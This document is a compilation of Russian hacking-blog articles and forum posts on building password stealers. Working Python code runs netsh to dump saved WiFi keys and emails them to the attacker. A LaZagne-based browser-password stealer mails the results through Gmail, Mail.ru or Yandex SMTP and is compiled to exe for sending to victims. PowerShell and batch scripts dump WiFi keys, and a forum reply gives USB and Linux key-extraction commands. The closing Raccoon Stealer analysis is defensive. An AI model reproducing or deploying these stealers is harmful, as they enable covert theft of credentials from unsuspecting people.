Создаём стиллер WiFi паролей
True Hack — не забудь подписаться на канал, чтоб не пропустить новые статьи!
И так, приступим!
Мы не призываем вас к каким-либо действиям, статья написана исключительно в ознакомительных целях, чтобы уберечь читателя от противоправных действий.
Вы когда-нибудь задумывались, есть ли у вас инструмент, который дает вам всю информацию обо всех беспроводных сетях (включая их пароли), когда-либо подключенных на компьютере windows к вашей электронной почте?
Ну, если это так, то вот в чем фокус. В этом трюке нет ракетостроения. Я бы сказал вам способ, чтобы вы могли получить всю информацию о каждой беспроводной сети, когда-либо подключенной к машине windows, к вашей учетной записи hotmail/outlook.
Обратите внимание, что этот трюк будет работать только в том случае, если целью является машина windows и у вас есть учетная запись outlook/hotmail. Кроме того, вы должны иметь базовые знания Python.
Итак, давайте начнем.
Сначала импортируйте два модуля python, то есть подпроцесс и ОС, с помощью команды:
import subprocess, os
Подпроцесс-это модуль, который работает как командная строка, и команда, которую вы даете ему в виде строки, может быть выполнена в командной строке целевого компьютера. После этого вам понадобится код python, который установит и импортирует модуль python, который по умолчанию недоступен в python, чтобы сделать это, напишите следующий код после приведенной выше строки:
command="pip install secure-smtplib"result=subprocess.check_output(command,shell=True) import smtplib
Это модуль, который поддерживает отправку электронных писем через python. Далее мы создадим функцию, которая будет отправлять нам полученную информацию по электронной почте с помощью модуля smtplib с помощью кода:
def send_mail(email,password,message): server = smtplib.SMTP(«smtp-mail.outlook.com»,587) server.starttls() server.login(email,password) server.sendmail(email,email,message) server.quit()
Этот модуль запускает сервер python для создания электронной почты и отправки ее человеку. Далее мы будем получать имена всех беспроводных сетей, хранящихся в машине, используя модуль подпроцесса. Массив a будет содержать имена сетей.
command=»netsh wlan show profile»networks=subprocess.check_output(command,shell=True)networks=networks.split()a,b=[],[]for i in range(len(networks)): networks[i]=str(networks[i]) networks[i]=networks[i][2:-1] if networks[i]==’All’: a.append(i) elif networks[i]==’:’: b.append(i)
Теперь, если вы распечатаете a в приведенном выше коде, вы увидите, что есть и некоторые другие слова, которые нам не понадобятся, поэтому мы будем извлекать полезную информацию из массива a в другой массив d с помощью приведенного ниже кода.
Теперь, поскольку мы сохранили имена всех беспроводных сетей, мы будем использовать модуль подпроцесса для извлечения информации о каждой беспроводной сети, включая их пароль, и отправки ее на ваш аккаунт hotmail.
result=b'' for i in d: if "'" in i: continue command='netsh wlan show profile "'+str(i)+'" key=clear' passwords=subprocess.check_output(command,shell=True) result=result+passwords send_mail("your hotmail emailid","your password",result)
Если вы заметили, я использовал результат=b’ ‘. Это потому, что если вам нужно отправить сообщение по электронной почте с помощью python, его тип должен быть байт. Python не может отправить сообщение, закодированное в виде строки, на вашу электронную почту.
Замените аргументы отправки почты своим идентификатором электронной почты и паролем. Вот и все, ваш код готов. Теперь вы можете использовать его для целеуказания любой машине windows и извлечения всей информации беспроводных сетей, хранящейся на цели.
Вы можете получить полный код на моем аккаунте github. Перейдите по ссылке:
● Buratinopol — хакинг, кибербезопасность, приватность, анонимность
● SOFTWARE — хранилище приватных софтов и прочей годноты. Подпишись!
● CODING — программирование доступным языком.
● Termux — one — гайды и статьи по Termux.
Стиллер на Python с отправкой по почте
Здравствуй, читатель сегодня поговорим о том почему не надо открывать непроверенные файлы скачанные с неизвестных источников и создадим такой файл чтобы понять что он может наделать на вашем ПК. Создавать мы будем стиллер который соберет все наши пароли и отправит их нам по почте.
Что для этого нужно?
- Python 3.x.x
- Инструмент для восстановления паролей(в нашем случае LaZagne)
- Два аккаунта Google
И так начинаем
Для начала поместим .exe файл инструмента LaZagne в папку с нашим проектом. Далее создадим .bat файл с любым названием(у меня будет main.bat) и файл send.py.
У нас должна получится такая структура:
Пишем код
Откроем файл main.bat и поместим туда код:
@Echo off laZagne.exe all > pass.txt
Теперь при запуске нашего .bat файла у нас появится файл pass.txt в котором будут все ваши пароли из браузеров(и не только). Осталось только отправить данные на почту. Но как это сделать?
Отправка на почту
Открываем файл send.py и вставляем код:
import smtplib import os import mimetypes from email import encoders from email.mime.base import MIMEBase from email.mime.text import MIMEText from email.mime.image import MIMEImage from email.mime.audio import MIMEAudio from email.mime.multipart import MIMEMultipart def send_email(addr_from, password, addr_to, files): msg_subj = 'Password' msg_text = 'Password' msg = MIMEMultipart() msg['From'] = addr_from msg['To'] = addr_to msg['Subject'] = msg_subj body = msg_text msg.attach(MIMEText(body, 'plain')) process_attachement(msg, files) #==========Код зависящий от сервиса========== server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(addr_from, password) server.send_message(msg) server.quit() #============================================ def process_attachement(msg, files): for f in files: if os.path.isfile(f): attach_file(msg,f) elif os.path.exists(f): dir = os.listdir(f) for file in dir: attach_file(msg,f+"/"+file) def attach_file(msg, filepath): filename = os.path.basename(filepath) ctype, encoding = mimetypes.guess_type(filepath) if ctype is None or encoding is not None: ctype = 'application/octet-stream' maintype, subtype = ctype.split('/', 1) if maintype == 'text': with open(filepath) as fp: file = MIMEText(fp.read(), _subtype=subtype) fp.close() elif maintype == 'image': with open(filepath, 'rb') as fp: file = MIMEImage(fp.read(), _subtype=subtype) fp.close() elif maintype == 'audio': with open(filepath, 'rb') as fp: file = MIMEAudio(fp.read(), _subtype=subtype) fp.close() else: with open(filepath, 'rb') as fp: file = MIMEBase(maintype, subtype) file.set_payload(fp.read()) fp.close() encoders.encode_base64(file) file.add_header('Content-Disposition', 'attachment', filename=filename) msg.attach(file) #=====Настройки================================= _from = "from@gmail.com" _password = "password" _to = "to@gmail.com" files = ["pass.txt"] #============================================= send_email(_from, _password, _to, files)
Теперь нужно настроить и в зависимости от сервиса по которому будете отправлять почту изменяем выделенный код: Google (прежде нужно разрешить доступ для менее безопасных приложений):
server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(addr_from, password) server.send_message(msg) server.quit()
server = smtplib.SMTP_SSL('smtp.mail.ru', 25) server.login(addr_from, password) server.send_message(msg) server.quit()
server = smtplib.SMTP_SSL('smtp.yandex.ru', 465) server.login(addr_from, password) server.send_message(msg) server.quit()
Доделываем .bat
Теперь в наш .bat файл добавим код запуска файла send.py и удаления файла pass.txt:
send.py del /s "pass.txt"
Сборка
Теперь после запуска main.bat ваши пароли будут отправлены к вам на почту но если у вас не установлен Python то ничего не получится нужно превратить наш send.py файл в exe. Для этого открываем консоль и пишем:
pip install pyinstaller pyinstaller --onefile send.py
Еще но нужно превратить main.bat файл в main.exe, и в этом нам поможет Bat To Exe Converter. Жмем на кнопку с тремя точками(«. «) и ищем ваш файл main.bat, жмем «Открыть», после чего жмем «Convert» и получаем файл main.exe. Эти три файла и есть наш стиллер, можем отправлять другу и радоваться проверять на работоспособность.
Powershell или же стиллер для wifi
Тема пойдет на powershell.
все мы знаем замечательную команду в CMD
1) » netsh wlan show profiles » — чтоб посмотреть на какие сети компухтер или ноут был подключен.
2)» netsh wlan show profiles «ESSID» key=clear» — чтоб посмотреть пароль от сети.
Нам не удобна смотреть каждый процесс отдельно. Вот поэтому ускорим этот с помощью POWERSHELL
» (netsh wlan show profiles) | Select-String «\.+)$» | % | % <(netsh wlan show profile name="$name" key=clear)>| Select-String «Содержимое ключа\W+\.+)$» | % | %> | Format-Table -AutoSize » — ENTER.
Но пока откроем POWERSHELL и напишем этот скрипт нас спалят(
и вот поэтому мы сейчас сделаем БАТ файл.
1) Отрываем Текстовый документ пишем » (netsh wlan show profiles) | Select-String «\.+)$» | % | % <(netsh wlan show profile name="$name" key=clear)>| Select-String «Содержимое ключа\W+\.+)$» | % | %> | Format-Table -AutoSize » (Без кавычек). И сохраняем » powerkey.ps1 »
2)Отрываем Текстовый документ пишем » powershell.exe -ExecutionPolicy Bypass -File powerkey.ps1 » Сохраняем pow.bat
3) и последний файл опять отрываем Текстовый документ пишем
@echo off
call pow.bat >wifi/1)wifi.txt 2>&1
exit
И сохраняем start.bat .
4) кидаем все 3 файла в одну папку и в этой же папке создаем папку с название » wifi «.
вот и все)
(САМ СКРИПТ НЕ РАБОТАЕТ НА ВСЕХ КОМПЬЮТЕРАХ, В моем случай 4/5) .
Последнее редактирование: 31.12.2017
☠xrahitel☠
Grey Team
09.12.2016 239 305
по сути на коротке нормально..
Remir
Grey Team
05.11.2017 241 347
-
Имею на флешке (я так понял, что вся суть ТС в том, чтобы увести PW WiFi) папку WiFi (назовем ее так), а в ней пятОк (можно десяток — кому как удобно и нужно) файлов 1.txt, 2.txt, 3.txt и т.д. со следующим содержанием:
netsh wlan show profiles netsh wlan show profiles "ESSID" key=clear
На случай Линукса можно добавить строку
sudo cat /etc/NetworkManager/system-connections/ИМЯ_СЕТИ | grep psk=
, а если имя неизвестно, то
sudo grep psk= /etc/NetworkManager/system-connections/*
. Для удобства их можно вообще держать вместе и выбирать по потребностям, я разнес только для визуального разделения. Итак, выдалась возможность «пошарить». Вставляем флешку, открываем под админом комстроку и текстовик 1. А дальше все быстро и просто: копируем Win-довые команды разом и перепрыгиваем на командную строку, не закрывая текстовик. Вставляем и у нас уже выполнилась первая строка, быстро вписываем ИМЯ_СЕТИ и жмем ENTER. В W10 остальное быстрее всего: CTRL+A, CTRL+C — перескок на текстовик CTRL+V, ALT+F4, ENTER. В младших ОС (за 8-рку не ручаюсь, я ее «органически не перевариваю» и даже не изучал) все эти операции придется выполнить мышкой. Для Линукса я даже расписывать не буду, тут операции с файлами знает 99%. А оставшемуся 1% я посоветую начать изучение Linux именно с этого пункта, а не с увода паролей.
Он находится на этой же флешке. Запускаем в зависимости от разрядности ОС и получаем результат
Через правую кнопку мыши на выбранной строке можно сделать экспорт в ASCII для удобочитаемости. Всего-то три щелчка мыши и результат в кармане.
P.S.
Мой пост нисколько не несет в себе отрицания способа ТС. Просто я предпочту изложенный мной вариант.
Обзор возможностей Raccoon Stealer
Вредоносное программное обеспечение Raccoon Stealer может доставляться многими способами, хотя чаще всего своих жертв он заражает благодаря использованию набора эксплойтов, применению фишинговых атак, а также через связанные вредоносные программы.
Доставка Raccoon Stealer с помощью набора эксплойтов
Наборы эксплойтов автоматически используют уязвимости на компьютере жертвы во время просмотра веб-страниц. Если во время серфинга по Интеренту пользователь посещает вредоносную страницу, то он может быть перенаправлен на другую целевую страницу, содержащую код эксплойта, часто выполняемый без согласия или какого-либо другого взаимодействия со стороны пользователя.
Чтобы доставить вредоносный код Raccoon на компьютер жертвы, злоумышленники используют комплект эксплойтов Fallout для создания экземпляра PowerShell из Internet Explorer и последующей загрузки основной полезной нагрузки стилера Raccoon.
Пример использования комплекта эксплойтов Fallout для доставки Raccoon Stealer
Доставка Raccoon Stealer с помощью фишинговых атак
Фишинг является разновидностью атак с использованием методов социальной инженерии, при которой пользователя-жертву обманом заставляют запустить вредоносный контент. Чаще всего пользователь получает электронное письмо с прикрепленным документом MS Office. Этот документ содержит встроенный вредоносный код макроса, который при открытии запускается.
Для доставки вредоносного программного обеспечения Raccoon злоумышленники используют электронные письма с прикрепленным зараженным документом Word. После открытия этого документа на компьютере жертвы и включения макросов, код макроса устанавливает соединение с вредоносным доменом и загружает основную полезную нагрузку стилера Raccoon.
Пример использования вредоносного документа Word для доставки полезной нагрузки стилера Raccoon
Доставка с помощью связанного вредоносного ПО
Связанное вредоносное ПО — это вредоносное программное обеспечение, связанное с легальным программным обеспечением, загруженным с «теневых» веб-сайтов. Злоумышленники также могут использовать методы социальной инженерии для обеспечения возможности установки. Связанное вредоносное ПО скрывается от пользователя во время установки и часто остается незамеченным.
Чтобы доставить вредоносный код Raccoon на компьютеры ничего не подозревающих пользователей, злоумышленники используют легальное программное обеспечение, связанное с основной полезной нагрузкой стилера. В этом случае стилер Raccoon устанавливает себя за кадром основной установки легального программного обеспечения, оставаясь скрытым от пользователя.
Исследование кода Raccoon Stealer и его основной функциональности
Полный внутренний путь для компиляции вредоносного ПО на машине злоумышленника с опечаткой, нехарактерной для носителей английского языка
Как уже упоминалось в первой части статьи, похоже, что команда по разработке вредоносного программного обеспечения Raccoon имеет русское происхождения. Опечатка, обнаруженная во внутреннем пути, также предполагает, что они не являются носителями английского языка.
Команда Raccoon дает рекомендацию по использованию стороннего шифровальщика
Основная полезная нагрузка Raccoon не упакована и не включает встроенную защиту от отладки или средства противодействия защите виртуальных машин. Он продается как есть, без какой-либо защиты от аналитиков по кибербезопасности или обнаружения. Тем не менее, команда Raccoon рекомендует использовать сторонний шифровальщик GreenCrypt для обхода антивирусных продуктов, а также защиты от обнаружения и анализа.
Коммуникация стилера Raccoon со своим C2-сервером
Как только загрузчик запускается на целевой машине, он распаковывается в памяти и подключается к своему серверу C2. Вредоносный код Raccoon отправляет POST-запрос с параметрами «bot_id» и «config_id» в кодировке Base64.
Вредоносный код Raccoon отправляет POST-запрос с двумя параметрами своему серверу C2
После успешного подключения и проверки идентификатора бота Raccoon, загружается сжатый zip-файл с несколькими различными библиотеками DLL. Эти библиотеки DLL не обязательно являются вредоносными сами по себе, но стилер Raccoon зависит от них для успешного сбора и кражи данных на целевой машине.
Сбор локальных настроек на локальной машине
Стилер Raccoon проверяет локальные настройки целевой машины
Кроме того, стилер Raccoon проверяет локальные настройки целевой машины и сравнивает их со списком языков, который включает русский, украинский, белорусский, казахский, киргизский, армянский, таджикский и узбекский. Если локальные настройки целевой машины соответствуют одному из этих языков, вредоносная программа немедленно прекращает работу. Это обычная практика для вредоносных программ, авторы которых являются выходцами из стран бывшего СНГ.
Сбор конфиденциальных данных
После первоначального заражения Raccoon Stealer использует несколько методов для сбора конфиденциальной информации. Он хранит любую конфиденциальную информацию, которую находит, в папке Temp.
Захват скриншотов с зараженной машины
Вредоносный код стилера Raccoon делает снимок экрана целевой машины жертвы
Стилер Raccoon делает снимок экрана целевой машины с помощью функций GetDesktopWindow и CreateCompatibleBitmap и сохраняет его как файл с именем «screen.jpeg» в папке «Temp».
Кража системной информации
Стилер Raccoon собирает системную информацию с зараженной машины, включая имя пользователя, IP-адрес, языковые настройки, версию ОС, информацию об установленных приложениях, а также информацию о процессоре и памяти. Все собранные данные хранятся в текстовом файле, который располагается в директории «C:\Users\[пользователь]\ AppData\Local\Temp\machineinfo.txt».
Собранная и сохраненная стилером Raccoon информация о целевой машине жертвы
Браузеры, на которые нацелен Raccoon Stealer
Большая часть сохраненных браузером данных хранится в файлах базы данных SQLite на локальном компьютере. Например, когда пользователь сохраняет свое имя пользователя и пароль в браузере, браузер хранит эти данные в файле базы данных SQLite. Браузер также хранит сохраненные cookie, а также различные данные автозаполнения, например, данные кредитной карты.
Стилер Raccoon крадет эту информацию из более чем тридцати различных типов браузеров. Он ищет в реестре информацию об установленных браузерах и пытается украсть из них учетные данные, файлы cookie и данные автозаполнения.
Список браузеров, на который нацелен стилер Raccoon:
- Chrome
- Firefox
- Opera
- tab
- Amigo
- RockMelt
- Sputnik
- Chromium
- Orbitum
- 360Browser
- Kometa
- Xpom
- Bromium
- Vivaldi
- uCozMedia
- Comodo
- Nichrome
- QIP Surf
- Epic Privacy Browser
- CocCoc
- Suhba
- Chedot
- CentBrowser
- Elements Browser
- Safer Technologies — Secure Browser
- Superbird
- 7Star
- TorBro
- Rafotech — Mustang
- Torch
- WaterFox
- SeaMonkey
- Pale Moon
- GO!
Пример конфигурации кода стилера Raccoon для кражи данных из браузера
Raccoon копирует целевые файлы данных браузера в папку «Temp» со случайными именами. Он использует библиотеку DLL «SQLite3.dll», загруженную со своего сервера C2, для анализа файлов и извлечения конфиденциальных данных. Похищенная информация делится на несколько текстовых файлов, названных по имени соответствующего браузера, и сохраняется в папке «Temp/browsers».
Стилер Raccoon также создает файл с именем «passwords.txt», в который сохраняются все пароли, украденные с компьютера жертвы.
Пример формата файла «passwords.txt», содержащего пароли, украденные стилером Raccoon
Кража учетных записей Microsoft Outlook
Стилер Raccoon также нацелен на учетные записи Microsoft Outlook.
Вредоносный код Raccoon также извлекает информацию об учетных записях Microsoft Outlook из следующих ключей реестра на целевой машине:
- «HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts»
- «HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings»
- «HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook»
Кроме того, стилер Raccoon ищет в реестре Windows конфиденциальную информацию, хранящуюся в почтовых клиентах, такую, как имена пользователей и пароли, а затем сохраняет ее в текстовый файл в папке «Temp/mails».
Стилер Raccoon собирает информацию из учетных записей почтового клиента на целевой машине
Кража кошельков с криптовалютой
Кроме того, вредоносная программа Raccoon ищет на машине жертвы кошельки с криптовалютой, в том числе:
- «C:\Users\ \AppData\Roaming\Electrum\wallets»
- «C:\Users\ \AppData\Roaming\Jaxx\Local Storage»
- «C:\Users\ \AppData\Roaming\Exodus\exodus.wallet»
- «C:\Users\ \AppData\Roaming\Ethereum Wallet»
Если какие-либо кошельки с криптовалютой будут обнаружены, они сохранются в папке Temp.
Для удобства клиента в стилере Raccoon есть служба, которая автоматически обрабатывает все кошельки с криптовалютой без необходимости искать определенные логи среди всех украденных данных.
Удаление данных и самоудаление
Raccoon Stealer сохраняет все украденные данные в zip-архиве «gate.zip» и отправляет информацию на свой C2-сервер.
Пример всех украденных данных, которые стилер Raccoon собрал на компьютере жертвы
После успешной эксфильтрации всех конфиденциальных данных вредоносное программное обеспечение Raccoon удаляет свой двоичный файл с машины жертвы. Для этого процесс Raccoon порождает выполнение ping.exe с помощью cmd.exe и выполняет команду удаления (смотрите рисунок ниже).
Вредоносный процесс, который стилер Raccoon создает для удаления любых своих следов на машине жертвы
Чем опасен Raccoon Stealer для бизнеса и частных лиц?
Судя по логам, выставленным на продажу подпольному киберсообществу, вредоносное программное обеспечение Raccoon за несколько первых месяцев своего существования заразил более 100 000 оконечных устройств по всему миру. Он прост в эксплуатации как для технически подкованных злоумышленников, так и для тех, кто практически не владеет необходимыми навыками для совершения киберпреступлений. Это потенциально дает огромному количеству людей быстрый и простой способ зарабатывать деньги на краже конфиденциальных данных, не вкладывая много средств или не имея для этого глубокого технического образования.
Вредоносное программное обеспечение Raccoon собирает широкий спектр информации (включая информацию о кредитных картах, кошельках с криптовалютой, имена пользователей и пароли, а также сохраненные данные из браузеров), которая затем используется для кражи денег, корпоративных данных и другой конфиденциальной информации. Также эти данные могут использоваться против жертв в качестве шантажа либо монетизироваться киберпреступниками путем продажи на площадках подпольных киберсообществ.
Заключение
Хотя Raccoon Stealer и не является самым инновационным вредоносным программным обеспечением для кражи паролей и другой конфиденциальной информации, он является довольно популярным в подпольном киберсообществе. Такого успеха команда Raccoon смогла добиться благодаря привлекательному сервису обслуживания клиентов и простоте использования, позволяющим киберпреступникам быстро и просто совершать киберпреступления без огромных личных вложений.
Эта история не обошлась без раздоров. Команда Raccoon столкнулась с несколькими публичными спорами на подпольных форумах и получила некоторую долю критики со стороны конкурентов. Несмотря на это и на то, что вредоносное программное обеспечение Raccoon появилось только в начале 2019 года, стилер оказался в десятке самых упоминаемых в подпольном киберсообществе вредоносных программ в 2019 году. Несмотря на все технические недостатки, отношение киберпреступников к Raccoon в целом положительное, а некоторые из них даже видят в нем лучшую замену для ныне несуществующего стилера Azorult.
Популярность вредоносного программного обеспечения Raccoon в сочетании с его ограниченным набором функциональности, но высоким уровнем распространения, говорит о растущей тенденции коммерциализации вредоносных программ, поскольку их автора все чаще стремятся создать платформы для преступлений, а не совершать преступления напрямую. Кроме того, если авторы вредоносных программ выбирают разработку MaaS, они должны перенимать многое из того, что делает и законный бизнес SaaS: использовать агрессивные маркетинговые усилия, опираться на положительные отзывы, осуществлять оперативную поддержку клиентов и регулярно улучшать функциональность своего продукта. Аналитики по кибербезопасности ожидают, что в обозримом будущем данная тенденция в киберпреступном мире по ставке на модель «вредоносное ПО как услуга» при разработке и продвижении вредоносного программного обеспечения не только сохраниться, но и будет стремительно развиваться. А это значит, что попыток краж конфиденциональной информации с каждым днем будет ставать все больше, так как все больше людей без необходимых для этого знаний смогут использовать вредоносное ПО в своих корыстных целях.
Защита конечных точек является ключом к защите от подобных методов атак.
Появились вопросы или нужна консультация? Обращайтесь!
Вечный параноик, Антон Кочуков.